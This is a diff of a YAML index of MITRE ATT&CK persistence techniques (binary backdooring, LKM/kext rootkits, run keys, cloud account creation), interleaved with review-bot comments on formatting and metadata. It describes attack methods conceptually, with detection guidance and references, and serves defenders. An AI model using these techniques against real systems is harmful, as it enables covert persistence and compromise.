+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
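Review bot: the rewritten T1554 description line carries over the existing typo "persistence though modifications" (should be "through"); since the text is upstream ATT&CK content, fix it at the source or leave it as-is rather than hand-patching the generated file. The `(Citation: Google Cloud Mandiant UNC3886 2024)` tags introduced in both new paragraphs do resolve, because the matching `source_name` is added to `external_references` in the `@@ -32514,6 +32941,11` hunk.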
@@ -32499,7 +32926,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -32514,6 +32941,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
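Review bot: the new reference description begins with a stray leading space inside the double-quoted scalar (`" Punsaen Boonyakarn, Shawn Chew, ..."`); YAML preserves that space in the parsed string, which breaks consistency with every other entry and with exact-match lookups on the description. Trim it in the upstream STIX data or have the generator strip surrounding whitespace.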
@@ -32527,11 +32959,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -32557,7 +32988,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -32571,7 +33001,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -32598,8 +33027,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -32610,7 +33039,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1546.014:
@@ -32651,7 +33081,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32671,12 +33101,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32730,11 +33159,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32821,9 +33249,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -32836,12 +33264,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32854,9 +33281,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -32865,13 +33294,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
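Review bot: the platform rename in this hunk (`Azure AD`, `Office 365` and `Google Workspace` replaced by `Office Suite` and `Identity Provider`) changes the keys that any per-platform index or matrix derived from `x_mitre_platforms` groups on; without the same mapping applied there, T1136.003 drops out of the old platform views and never appears in the new ones. The same rename is applied to T1098.005, T1098.001 and T1098 elsewhere in this patch, so the downstream check should cover all of them.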
@@ -32919,14 +33348,11 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -32962,16 +33388,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -33012,143 +33437,141 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
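Review bot: nearly all of this 143-line hunk is key reordering of the T1547.006 object (`description`, `x_mitre_detection`, `kill_chain_phases`, `external_references` and the data-source list are deleted and re-added with identical text); the only substantive content change visible is in the iDefense reference, where the URL moves from `http://` to `https://` and the retrieved date becomes `September 12, 2024`, plus `x_mitre_attack_spec_version` 2.1.0 to 3.2.0 with `x_mitre_version` staying at `'1.3'`. Emitting keys in a stable order (for example the order of the upstream STIX object, or sorted) would make future syncs reviewable; as it stands a reader has to diff the two copies of the description by hand to confirm nothing changed.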
@@ -33185,7 +33608,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
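Review bot: the `modified` timestamp for T1574.013 moves backwards here, from `2022-05-11T14:00:00.188Z` to `2022-03-22T15:47:33.915Z`, and the same backward move appears later in this patch for T1542.004 (`2021-04-29` to `2020-10-22`) and T1505.004 (`2022-04-25` to `2021-10-17`). The old value `2022-05-11T14:00:00.188Z` is shared by several unrelated records in the previous index, so the earlier generator was probably stamping a bulk-release date rather than the object's own `modified`; worth confirming that the new value is the per-object date from the intended ATT&CK release and not a stale bundle.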
@@ -33211,12 +33634,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
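Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from the T1574.013 record in this hunk and no replacement value is added anywhere in the hunk, unlike the other records in this patch where a `3.2.0` line is inserted elsewhere in the object. T1542.004 and T1505.004 further down show the same pattern (`2.1.0` removed, nothing added). Check whether these three objects carry the field at another position after the change; if not, the generator is dropping the spec version for objects that were not touched upstream, and downstream code that branches on it will see a missing key.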
@@ -33294,9 +33715,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1542.004:
@@ -33323,7 +33743,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -33345,41 +33765,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
